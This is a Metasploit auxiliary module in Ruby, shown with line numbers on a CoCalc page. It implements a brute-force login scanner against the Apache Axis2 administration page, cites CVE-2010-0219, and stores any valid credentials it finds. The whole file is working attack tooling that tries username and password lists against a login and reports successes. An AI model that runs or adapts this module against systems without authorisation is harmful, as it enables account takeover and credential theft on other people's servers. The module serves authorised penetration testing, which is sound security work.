CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'metasploit/framework/login_scanner/axis2'
7
require 'metasploit/framework/credential_collection'
8

9
class MetasploitModule < Msf::Auxiliary
10
  include Msf::Exploit::Remote::HttpClient
11
  include Msf::Auxiliary::AuthBrute
12
  include Msf::Auxiliary::Report
13
  include Msf::Auxiliary::Scanner
14

15

16
  def initialize
17
    super(
18
      'Name'           => 'Apache Axis2 Brute Force Utility',
19
      'Description'    => %q{
20
        This module attempts to login to an Apache Axis2 instance using
21
        username and password combinations indicated by the USER_FILE,
22
        PASS_FILE, and USERPASS_FILE options. It has been verified to
23
        work on at least versions 1.4.1 and 1.6.2.
24
      },
25
      'Author'         =>
26
        [
27
          'Leandro Oliveira <leandrofernando[at]gmail.com>'
28
        ],
29
      'References'     =>
30
        [
31
          [ 'CVE', '2010-0219' ],
32
          [ 'OSVDB', '68662'],
33
        ],
34
      'License'        => MSF_LICENSE
35
    )
36

37
    register_options( [
38
      Opt::RPORT(8080),
39
      OptString.new('TARGETURI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),
40
    ])
41
  end
42

43
  # For print_* methods
44
  def target_url
45
    "http://#{vhost}:#{rport}#{datastore['URI']}"
46
  end
47

48
  def run_host(ip)
49
    uri = normalize_uri(target_uri.path)
50

51
    print_status("Verifying login exists at #{target_url}")
52
    begin
53
      send_request_cgi({
54
        'method'  => 'GET',
55
        'uri'     => uri
56
      }, 20)
57
    rescue => e
58
      print_error("Failed to retrieve Axis2 login page at #{target_url}")
59
      print_error("Error: #{e.class}: #{e}")
60
      return
61
    end
62

63
    print_status "#{target_url} - Apache Axis - Attempting authentication"
64

65
    cred_collection = build_credential_collection(
66
      username: datastore['USERNAME'],
67
      password: datastore['PASSWORD']
68
    )
69

70
    scanner = Metasploit::Framework::LoginScanner::Axis2.new(
71
      configure_http_login_scanner(
72
        uri: uri,
73
        cred_details: cred_collection,
74
        stop_on_success: datastore['STOP_ON_SUCCESS'],
75
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
76
        connection_timeout: 5,
77
        http_username: datastore['HttpUsername'],
78
        http_password: datastore['HttpPassword']
79
      )
80
    )
81

82
    scanner.scan! do |result|
83
      credential_data = result.to_h
84
      credential_data.merge!(
85
          module_fullname: self.fullname,
86
          workspace_id: myworkspace_id
87
      )
88
      case result.status
89
      when Metasploit::Model::Login::Status::SUCCESSFUL
90
        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
91
        credential_core = create_credential(credential_data)
92
        credential_data[:core] = credential_core
93
        create_credential_login(credential_data)
94
        :next_user
95
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
96
        if datastore['VERBOSE']
97
          print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
98
        end
99
        invalidate_login(credential_data)
100
        :abort
101
      when Metasploit::Model::Login::Status::INCORRECT
102
        if datastore['VERBOSE']
103
          print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
104
        end
105
        invalidate_login(credential_data)
106
      end
107
    end
108

109
  end
110

111

112

113
end
114

115